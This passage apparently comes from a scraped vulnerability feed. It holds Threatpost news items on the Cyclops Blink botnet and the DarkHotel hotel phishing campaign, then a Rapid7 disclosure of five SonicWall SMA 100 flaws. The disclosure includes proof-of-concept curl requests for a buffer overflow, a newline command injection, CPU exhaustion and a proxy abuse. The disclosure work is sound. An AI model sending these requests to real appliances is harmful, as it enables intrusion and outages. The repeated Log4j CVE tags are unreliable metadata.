that might emerge from the use of NFTs/cryptocurrency, including popular scams/social engineering attempts circulating today.\n * Steps individuals/businesses can take to protect themselves.\n * What is driving their popularity and if NFTs are here to stay.\n * Regulations on blockchain technology.\n\nYou\u2019ve heard it a thousand times before, but Dr. Kostopoulos says it\u2019s real: Blockchain technology is transformative. Look out for state-backed currencies and blockchain-enabled voting that can\u2019t be tampered with, for starters. Look for NFT invitations to artists\u2019 performances that keep giving as those artists reward their ticket holders with future swag. And for the love of Pete, don\u2019t lose your cold wallets if you want to keep your crypto safe.\n\nIf you don\u2019t yet know what a cold wallet is, definitely have a listen!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/032522_KnowBe4_Lydia_mixdown_2.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T13:00:09", "type": "threatpost", "title": "A Blockchain Primer and Bored Ape Headscratcher \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T13:00:09", "id": "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "href": "https://threatpost.com/a-blockchain-primer-and-a-bored-ape-headscratcher-podcast/179179/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). Now, to further its goal of widescale infections, ASUS routers are now on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. \u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. \u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. \u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. These can be aimed at the core component itself or to one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n**Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. \u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes it to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files: \n * /etc/passwd\n * /etc/group\n * /proc/mounts\n * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZDE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nLike with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 MGTO.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. \u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks **\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.'\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade & Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign **\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-01-11T15:27:04", "description": "\n\nOver the course of routine security research, Rapid7 researcher Jake Baines discovered and reported five vulnerabilities involving the SonicWall Secure Mobile Access (SMA) 100 series of devices, which includes SMA 200, 210, 400, 410, and 500v. The most serious of these issues can lead to unauthenticated remote code execution (RCE) on affected devices. We reported these issues to SonicWall, who published [software updates](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) and have released fixes to customers and channel partners on December 7, 2021. Rapid7 urges users of the SonicWall SMA 100 series to apply these updates as soon as possible. The table below summarizes the issues found.\n\n**CVE ID** | **CWE ID** | **CVSS** | **Fix** \n---|---|---|--- \nCVE-2021-20038 | [CWE-121: Stack-Based Buffer Overflow](<https://cwe.mitre.org/data/definitions/121.html>) | [9.8](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \nCVE-2021-20039 | [CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u201cOS Command Injection\u201d)](<https://cwe.mitre.org/data/definitions/78.html>) | [7.2](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \nCVE-2021-20040 | [CWE-23: Relative Path Traversal](<https://cwe.mitre.org/data/definitions/23.html>) | [6.5](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \nCVE-2021-20041 | [CWE-835: Loop With Unreachable Exit Condition (\u201cInfinite Loop\u201d)](<https://cwe.mitre.org/data/definitions/835.html>) | [7.5](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \nCVE-2021-20042 | [CWE-441: Unintended Proxy or Intermediary (\u201cConfused Deputy\u201d)](<https://cwe.mitre.org/data/definitions/441.html>) | [6.5](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \n \nThe rest of this blog post goes into more detail about the issues. Vulnerability checks are available to InsightVM and Nexpose customers for all five of these vulnerabilities.\n\n## Product description\n\nThe SonicWall SMA 100 series is a popular edge network access control system, which is implemented as either a standalone hardware device, a virtual machine, or a hosted cloud instance. More about the SMA 100 series of products can be found [here](<https://www.sonicwall.com/products/remote-access/secure-mobile-access-100-series/>). \n\nTesting was performed on the SMA 500v firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. CVE-2021-20038 and CVE-2021-20040 affect only devices running version 10.2.x, while the remaining issues affect both firmware versions. Note that the vendor has released updates and at their KB article, [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>), to address all these issues.\n\n## Credit\n\nThese issues were discovered by [Jake Baines](<https://twitter.com/Junior_Baines>), Lead Security Researcher at Rapid7. These issues are being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## CVE-2021-20038: Stack-based buffer overflow in httpd\n\n**Affected version:** 10.2.1.2-24sv\n\nThe web server on tcp/443 (/usr/src/EasyAccess/bin/httpd) is a slightly modified version of the Apache httpd server. One of the notable modifications is in the mod_cgi module (/lib/mod_cgi.so). Specifically, there appears to be a custom version of the `cgi_build_command` function that appends all the environment variables onto a single stack-based buffer using `strcat`.\n\nThere is no bounds-checking on this environment string buildup, so if a malicious attacker were to generate an overly long `QUERY_STRING`, they can overflow the stack-based buffer. The buffer itself is declared at the top of the `cgi_handler` function as a 202 byte character array (although, it's followed by a lot of other stack variables, so the depth to cause the overflow is a fair amount more).\n\nRegardless, the following `curl` command demonstrates the crash when sent by a remote and unauthenticated attacker:\n\n`curl --insecure \"https://10.0.0.7/?AAAA[1794 more A's here for a total of 1798 A's]\"`\n\nThe above will trigger the following crash and backtrace:\n\n\n\nTechnically, the above crash is due to an invalid read, but you can see the stack has been successfully overwritten above. A functional exploit should be able to return to an attacker's desired address. The system does have address space layout randomization (ASLR) enabled, but it has three things working against this protection:\n\n 1. httpd's base address is not randomized.\n 2. When httpd crashes it is auto restarted by the server, giving the attacker opportunity to guess library base addresses, if needed.\n 3. SMA 100 series are 32 bit systems and ASLR entropy is low enough that guessing library addresses a feasible approach to exploitation.\n\nBecause of these factors, a reliable exploit for this issue is plausible. It's important to note that httpd is running as the \"nobody\" user, so attackers don't get to go straight to root access, but it's one step away, as the exploit payload can su to root using the password \"password.\"\n\n### CVE-2021-20038 exploitation impact\n\nThis stack-based buffer overflow has a suggested CVSS score of [9.8](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H&version=3.1>) out of 10 \u2014 by exploiting this issue, an attack can get complete control of the device or virtual machine that's running the SMA 100 series appliance. This can allow attackers to install malware to intercept authentication material from authorized users, or reach back into the networks protected by these devices for further attack. Edge-based network control devices are especially attractive targets for attackers, so we expect continued interest in these kinds of devices by researchers and criminal attackers alike.\n\n## CVE-2021-20039: Command injection in cgi-bin\n\n**Affected versions:** 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv\n\nThe web interface uses a handful of functions to scan user-provided strings for shell metacharacters in order to prevent command injection vulnerabilities. There are three functions that implement this functionality (all of which are defined in libSys.so): isSafeCommandArg, safeSystemCmdArg, and safeSystemCmdArg2.\n\nThese functions all scan for the normal characters (&|$><;' and so on), but they do not scan for the new line character ('\\n'). This is problematic because, when used in a string passed to `system`, it will act as a terminator. There are a variety of vectors an attacker could use to bypass these checks and hit `system`, and one (but certainly not the only) example is `/cgi-bin/viewcert`, which we'll describe in more detail here.\n\nThe web interface allows authenticated individuals to upload, view, or delete SSL certificates. When deleting a certificate, the user provides the name of the directory that the certificate is in. These names are auto-generated by the system in the format of newcert-1, newcert-2, newcert-3, etc. A normal request would define something like `CERT=newcert-1`. The CERT variable makes it to a `system` call as part of an `rm -rf %s` command. Therefore, an attacker can execute arbitrary commands by using the '\\n' logic in CERT. For example, the following would execute ping to 10.0.0.9:\n\n`CERT=nj\\n ping 10.0.0.9 \\n`\n\nTo see that in a real request, we have to first log in:\n\n`curl -v --insecure -F username=admin -F password=labpass1 -F domain=LocalDomain -F portalname=VirtualOffice -F ajax=true https://10.0.0.6/cgi-bin/userLogin`\n\nThe system will set a `swap` cookie. That's your login token, which can be copied into the following request. The following requests executes ping via viewcert:\n\n`curl -v --insecure --Cookie swap=WWR0MElDSXJuTjdRMElTa3lQTmRPcndnTm5xNWtqN0tQQUlLZjlKZTM1QT0= -H \"User-Agent: SonicWALL Mobile Connect\" -F buttontype=delete -F $'CERT=nj \\nping 10.0.0.9 \\n' https://10.0.0.6/cgi-bin/viewcert`\n\nIt's important to note that `viewcert` elevates privileges so that when the attacker hits `system`, they have root privileges.\n\n### CVE-2021-20039 exploitation impact\n\nNote that this vulnerability is post-authentication and leverages the administrator account (only administrators can manipulate SSL certificates). An attacker would already need to know (or guess) a working username and password in order to elevate access from administrator to root-level privileges. In the ideal case, this is a non-trivial barrier to entry for attackers. That said, the SMA 100 series does ship with a default password for the administrator account, and most organizations allow administrators to choose their own password, and we also know that the number of users for any device that stick with the default or easily guessed passwords is non-zero.\n\n## CVE-2021-20040: Upload path traversal in sonicfiles\n\n**Affected version:** 10.2.0.8-37sv and 10.2.1.2-34sv\n\nThe SMA 100 series allows users to interact with remote SMB shares through the HTTPS server. This functionality resides in the endpoint `https://address/fileshare/sonicfiles/sonicfiles`. Most of the functionality simply flows through the SMA series device and doesn't actually leave anything on the device itself, with the notable exception of `RacNumber=43`. That is supposed to write a file to the /tmp directory, but it is vulnerable to path traversal attacks.\n\nTo be a bit more specific, `RacNumber=43` takes two parameters:\n\n * `swcctn`: This value gets combined with `/tmp/` \\+ the current date to make a filename.\n * A JSON payload. The payload is de-jsonified and written to the swcctn file.\n\nThere is no validation applied to `swcctn`, so an attacker can provide arbitrary code. The example below writes the file "hello.html.time" to the web server's root directory:\n\n\n\nThis results in:\n\n\n\n### CVE-2021-20040 exploitation impact\n\nThere are some real limitations to exploiting CVE-2021-20040:\n\n 1. File writing is done with `nobody` privileges. That limits where an attacker can write significantly, although being able to write to the web server's root feels like a win for the attacker.\n\n 2. The attacker can't overwrite any existing file due to the random digits attached to the filename.\n\nGiven these limitations, an attack scenario will likely involve tricking users into believing their custom-created content is a legitimate function of the SMA 100, for example, a password "reset" function that takes a password.\n\n## CVE-2021-20041: CPU exhaustion in sonicfiles\n\n**Affected versions:** 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv\n\nAn unauthenticated, remote adversary can consume all of the device's CPU due to crafted HTTP requests sent to `hxxps://address/fileshare/sonicfiles/sonicfiles`, resulting in an infinite loop in the `fileexplorer` process. The infinite loop is due to the way `fileexplorer` parses command line options. When parsing an option that takes multiple parameters, `fileexplorer` incorrectly handles parameters that lack spaces or use the `=` symbol with the parameter. For example, the following requests results in the infinite loop:\n\n`curl --insecure -v --Cookie swap=bG9s \"https://10.0.0.6/fileshare/sonicfiles/sonicfiles?RacNumber=25&Arg1=smb://10.0.0.1/lol/test&Arg2=-elol&User=test&Pass=test\"`\n\nThe above request will result in `fileexplorer` being invoked like so:\n\n`/usr/sbin/fileexplorer -g smb://10.0.0.9/lol/test -elol -u test:test`\n\nParsing the "-elol" portion triggers the infinite loop. Each new request will spin up a new `fileexplorer` process. Technically speaking, on the SMA 500v, only two such requests will result in ~100% CPU usage indefinitely. Output from top:\n\n\n\n### CVE-2021-20041 exploitation impact\n\nA number of additional requests are required to truly deny availability, as this is not a one-shot denial of service request. It should also be noted that this is a parameter injection issue \u2014 specifically, the -e parameter is injected, and if the injection in this form didn't result in an infinite loop, the attack would have been able to exfiltrate arbitrary files (which of course would be more useful to an attacker).\n\n## CVE-2021-20042: Confused deputy in sonicfiles\n\n**Affected versions:** 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv\n\nAn unauthenticated, remote attack can use SMA 100 series devices as an "unintended proxy or intermediary," also known as a Confused Deputy attack. In short, that means an outside attacker can use the SMA 100 series device to access systems reachable via the device's internal facing network interfaces. This is due to the fact that the sonicfiles component does not appear to validate the requestor's authentication cookie until _after_ the `fileexplorer` request is made on the attacker's behalf. Furthermore, the security check validating that the endpoint `fileexplorer` is accessing is allowed is commented out from RacNumber 25 (aka COPY_FROM). Note the "_is_url_allow" logic below:\n\n\n\nThis results in the following:\n\n * An attacker can bypass the SMA 100 series device's firewall with SMB-based requests.\n * An attacker can make arbitrary read/write SMB requests to a third party the SMA 100 series device can reach. File creation, file deletion, and file renaming are all possible.\n * An attacker can make TCP connection requests to arbitrary IP:port on a third party, allowing the remote attacker to map out available IP/ports on the protected network.\n\nJust as a purely theoretical example, the following requests sends a SYN to 8.8.8.8:80:\n\n`curl --insecure -v --Cookie swap=bG9s 